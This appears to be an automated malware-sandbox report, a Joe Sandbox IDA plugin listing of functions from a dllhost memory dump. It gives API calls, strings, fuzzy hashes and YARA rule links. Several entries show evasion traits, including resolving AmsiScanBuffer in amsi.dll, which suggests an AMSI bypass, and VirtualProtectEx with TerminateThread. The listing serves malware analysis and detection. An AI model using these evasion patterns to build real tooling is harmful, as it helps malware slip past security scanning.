String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 99a9261cc867517e1fa60c3b37c89653b47c25fdf1460680f394c9211acc09f1
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 52010935785A80C6FB19EB12A858B9A63A1FB8CFC8F484035DF5B53764DE38D585C740

Function 000001C0401F3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001C0401F3AAC), ref: 000001C0401F3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001C0401F3AAC), ref: 000001C0401F3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001C0401F3AAC), ref: 000001C0401F3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001C0401F3AAC), ref: 000001C0401F3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001C0401F3AAC), ref: 000001C0401F3E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001C0401F3AAC), ref: 000001C0401F3EAE

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: aee6336f9fd36d82a8a0cf4f9f771f0f414139064cf5eeb90bebdae93916dc65
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: C6012D75251B41C2FB2AEB21E948B9B73A1BB8EB49F144025DB4E263A5EF3DC048C740

Function 000001C0401C3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001C0401C3AAC), ref: 000001C0401C3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001C0401C3AAC), ref: 000001C0401C3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001C0401C3AAC), ref: 000001C0401C3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001C0401C3AAC), ref: 000001C0401C3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001C0401C3AAC), ref: 000001C0401C3E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001C0401C3AAC), ref: 000001C0401C3EAE

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: fe219552678d3d254eaf2b4253f1fa970ec9f63d1c8b6b28d8e3abb369a7d46d
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: F4010975291740C2FB2AEB21E848B9A67A0AF8CF49F140425EB4B26774EF3DC058C740

Function 000001C0401F1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001C0401F1AF4
StrCmpNIW.SHLWAPI ref: 000001C0401F1B0E
lstrlenW.KERNEL32 ref: 000001C0401F1B1D
StrCpyW.SHLWAPI ref: 000001C0401F1B32

Strings

\\?\, xrefs: 000001C0401F1B02

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 5a759e75dac7ead3a9f7f9a5778f9f382bb62d71059dc2f16bf0fecabb74acb0
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 5EF03C72354796D2FB25DB21E684B9BA361F78CB9CF8440219B49569A4DE6CC688CB00

Function 000001C0401C1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001C0401C1AF4
StrCmpNIW.SHLWAPI ref: 000001C0401C1B0E
lstrlenW.KERNEL32 ref: 000001C0401C1B1D
StrCpyW.SHLWAPI ref: 000001C0401C1B32

Strings

\\?\, xrefs: 000001C0401C1B02

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 061a11a583a4fd284594cbf5ae3652408d756ad7a2c7c9276b7f2a399ea03b8a
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: FFF04F72394685D2FB25DB21F584B9A6371FB89FCCFC48021DB4B56964DE6CCA88CB00

Function 000001C0401F3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001C0401F275A), ref: 000001C0401F372A
StrCpyW.SHLWAPI ref: 000001C0401F373A
StrCatW.SHLWAPI ref: 000001C0401F3746
PathCombineW.SHLWAPI(?,?,00000000,000001C0401F275A), ref: 000001C0401F3754

Strings

\\.\pipe\, xrefs: 000001C0401F3720

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: e6e782a81b2bdd47ca626a69a8d6b85b5cb9f9b31fc63ff07c81f7d40a1ba6be
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 1AF082B4754B92C2FA4DEB13BA1859B6260BB4DFC8F449170EF0A27BA8CE2CC4458700

Function 000001C0401FB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001C0401FB929
GetProcAddress.KERNEL32 ref: 000001C0401FB93F
FreeLibrary.KERNEL32 ref: 000001C0401FB95B

Strings

CorExitProcess, xrefs: 000001C0401FB938
mscoree.dll, xrefs: 000001C0401FB920

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 07cf66e5b7ee7571d062d07f106d9a1e0f7ed6d4c889de0f4b9146d5ad7e5843
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: DBF09071380702C1FA1ADB24A888FAB6364FB8DB6CF540219DB6A661F4CF3CC448C300

Function 000001C0401C3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001C0401C275A), ref: 000001C0401C372A
StrCpyW.SHLWAPI ref: 000001C0401C373A
StrCatW.SHLWAPI ref: 000001C0401C3746
PathCombineW.SHLWAPI(?,?,00000000,000001C0401C275A), ref: 000001C0401C3754

Strings

\\.\pipe\, xrefs: 000001C0401C3720

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 1a700f1d16cc8ab77c86ccfac3266e67e751a952f2d874ff9ec10c266ec1caf0
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: CCF05EB4354B80D2FB19DB12B91459A6661BB4CFC9F448030EF0B27B68CE28D4458700

Function 000001C0401CB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001C0401CB929
GetProcAddress.KERNEL32 ref: 000001C0401CB93F
FreeLibrary.KERNEL32 ref: 000001C0401CB95B

Strings

CorExitProcess, xrefs: 000001C0401CB938
mscoree.dll, xrefs: 000001C0401CB920

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: bdc0c72e5b56717113a3f5ec42b62416de48a6e3182684ff969e52cd79e24a68
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 0DF06D71284601C1FB1ADB24A884BAB6320AF8DB69F940319DB6BA61F4CF3CC448C200

Function 000001C0401F1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000001C0401F1E47
GetProcAddress.KERNEL32 ref: 000001C0401F1E57
Sleep.KERNEL32 ref: 000001C0401F1E67

Strings

AmsiScanBuffer, xrefs: 000001C0401F1E50
amsi.dll, xrefs: 000001C0401F1E40

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 3ed7841d8f33fb771b9b8d3b75ce19e2169425255b445ff17969f7e1366fcea7
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 39D062706A2712D5F90FFB11D954BD722626F5DF09FD44415C70E212E0DE2CC5598340

Function 000001C0401C1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000001C0401C1E47
GetProcAddress.KERNEL32 ref: 000001C0401C1E57
Sleep.KERNEL32 ref: 000001C0401C1E67

Strings

amsi.dll, xrefs: 000001C0401C1E40
AmsiScanBuffer, xrefs: 000001C0401C1E50

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: d773f82b61776e8c5af9b1f9cfba90243f458051ec459a872ba838094c49541e
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 93D067306E5645D5FA0FFB15E854BD62361AFACF09FC40815C70F612B0DE2CE5598340

Function 000001C0401F5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001C0401F5896

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 396ffe4f8bd65a235e9faff172d5bae8442481ee3ddc669c39a89c51ff0576ce
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 4B02D532259B85C6E7A5DB55E49079BB7A0F3C8B98F100015EB8F97BA9DB78C494CB00

Function 000001C0401C5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001C0401C5896

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 25af94db02c113e2e071834ebbae11126ab0f927b72e676e9f90b72b355dac74
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: F502D53629DB84C6F765DB55E49079BB7A0F388B98F100015EB8F97BA8DB78C494CB00

Function 000001C0401F2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001C0401F2CAD
TlsGetValue.KERNEL32 ref: 000001C0401F2CBC
TlsGetValue.KERNEL32 ref: 000001C0401F2CCB
TlsSetValue.KERNEL32 ref: 000001C0401F2E0F
TlsSetValue.KERNEL32 ref: 000001C0401F2E1E
TlsSetValue.KERNEL32 ref: 000001C0401F2E2D

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: c0ff7504cc1287d95fecc32aff3352efa6d6da735263686e96a439a5e9777bae
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 95518E35694612CBF76ADB16A440E9BB3A4F78CB88F604119DF4B63BA5DB38C845CB40

Function 000001C0401C2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001C0401C2CAD
TlsGetValue.KERNEL32 ref: 000001C0401C2CBC
TlsGetValue.KERNEL32 ref: 000001C0401C2CCB
TlsSetValue.KERNEL32 ref: 000001C0401C2E0F
TlsSetValue.KERNEL32 ref: 000001C0401C2E1E
TlsSetValue.KERNEL32 ref: 000001C0401C2E2D

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: b7f86f4860ce4ab95438b03f52ec6ba2dd4c97ec051b90cb342c1004c2500665
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 45518B36688601C7F36ADB56E440EABB3A0F79CF98F604119DF5B63B64DB38C8458B40

Function 000001C0401F2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001C0401F2AE1
TlsGetValue.KERNEL32 ref: 000001C0401F2AF0
TlsGetValue.KERNEL32 ref: 000001C0401F2AFF
TlsSetValue.KERNEL32 ref: 000001C0401F2C3B
TlsSetValue.KERNEL32 ref: 000001C0401F2C4A
TlsSetValue.KERNEL32 ref: 000001C0401F2C59

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 9f172a097ba4bff7bc90c5481ea7216b2f7f41c7e61730e98e6c4028227e6e44
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 7A515936294642C7F72ADF16A840E9BB3A1F78DB88F504119DF4A637A4DF39C8468B40

Function 000001C0401C2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001C0401C2AE1
TlsGetValue.KERNEL32 ref: 000001C0401C2AF0
TlsGetValue.KERNEL32 ref: 000001C0401C2AFF
TlsSetValue.KERNEL32 ref: 000001C0401C2C3B
TlsSetValue.KERNEL32 ref: 000001C0401C2C4A
TlsSetValue.KERNEL32 ref: 000001C0401C2C59

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: f1811b62cef40caee9a19e2727fd6307eb40520002ccd217abf5d696df12a82a
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 82514736298641C7F72ADB26A840E9BB3A1F78CF88F544129DF5B63764DB38D8458B40

Function 000001C0401F5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001C0401F5E66

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: e5bb023d385784ec0b3c27125e4a9e58ec1ac2bb671deb06b5d485ac83def99c
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
